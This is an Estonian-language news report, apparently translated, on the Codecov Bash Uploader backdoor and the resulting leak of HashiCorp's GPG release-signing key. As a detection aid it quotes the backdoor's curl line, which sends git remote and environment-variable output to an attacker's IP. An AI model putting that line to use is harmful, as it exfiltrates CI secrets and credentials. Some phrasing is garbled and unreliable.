HashiCorp, tuntud avatud tööriistade nagu Vagrant, Packer, Nomad ja Terraform arendajana, teatas, et nende GPG-salat vĂ”tme lekkimine, mida kasutatakse digitaalsete allkirjade loomisel versioonide kinnitamiseks, on toimunud. RĂŒndajad, kes pÀÀsesid GPG-vĂ”tmele ligi, said potentsiaalselt varjata muudatusi HashiCorpi toodetes, kinnitades need Ă”ige digitaalse allkirjaga. Samuti teatas ettevĂ”te, et lĂ€bi viidud auditi kĂ€igus ei leitud tĂ”endeid selliste muudatuste tegemise katsete kohta.
Praegu on sotsialiseeritud GPG-vÔti tagasitehtud ja selle asemel on sisse viidud uus vÔti. Probleem puudutas ainult verifitseerimist SHA256SUM ja SHA256SUM.sig failide kaudu ning ei mÔjutanud digitaalsete allkirjade loomist DEB ja RPM Linuxi pakettide jaoks, mis on saadetud lÀbi releases.hashicorp.com, samuti versioonide kinnitamise mehhanisme macOS ja Windows (AuthentiCode).
Lekked toimusid, kuna Codecov'i infrastruktuuris kasutati Bash Uploader skripti (codecov-bash), mis on mĂ”eldud katvusraportite ĂŒleslaadimiseks pideva integreerimise sĂŒsteemidest. Codecov'i ettevĂ”tte vastu toimunud rĂŒnnaku kĂ€igus, oli kĂ€esolev skript peidetud tagauksega, mille kaudu saadeti paroole ja krĂŒpteerimisvĂ”tmeid. server rĂŒndajatele.
RĂŒnna vĂ”ime saavutamiseks kasutati rĂŒndajate poolt viga Codecov'i Docker-konteineri loomise protsessis, mis lubas pÀÀseda GCS (Google Cloud Storage) ligipÀÀsudeni, mis on vajalikud Bash Uploader skripti muutmiseks, mille levitamine toimus aadressil codecov.io. Muudatused tehti juba 31. jaanuaril, mis jĂ€id kaks kuud mĂ€rkamatuks ja vĂ”imaldasid kurjategijatel pÀÀseda ligi teabele, mis on salvestatud klientide pideva integreerimise sĂŒsteemide keskkondadesse. Lisatud kahjurehe koodi kaudu said rĂŒndajad teavet testitavate Git-repositoariumide ja nende keskkonnamuutujate kohta, sealhulgas ka neid, mis sisaldasid ligipÀÀsutooteid, krĂŒpteerimisvĂ”tmeid ja paroole, mis edastatakse pideva integreerimise sĂŒsteemidesse, et luua juurdepÀÀs rakenduste koodile, hoiustamisportaalidele ja teenustele nagu Amazon Web Services ja GitHub.
Lisaks otsekutsumisele kasutati Codecov Bash Uploaderit ka teiste ĂŒleslaadijate, nĂ€iteks Codecov-action (Github), Codecov-circleci-orb ja Codecov-bitrise-sammud, koostisosana, ning nende kasutajad on samuti probleemi all. KĂ”ikidele Codecov-bashi ja seotud toodete kasutajatele soovitatakse lĂ€bi viia oma infrastruktuuri audit ning vahetada paroolid ja krĂŒpteerimisvĂ”tmed. Skripti tagatsioonide olemasolu saab kontrollida, otsides selles jĂ€rgmist rida: curl -sm 0.5 -d «$(git remote -v)<<<<<< ENV $(env)» http://<rĂŒnnakute IP>/upload/v2 || true.
Allikas: opennet.ru
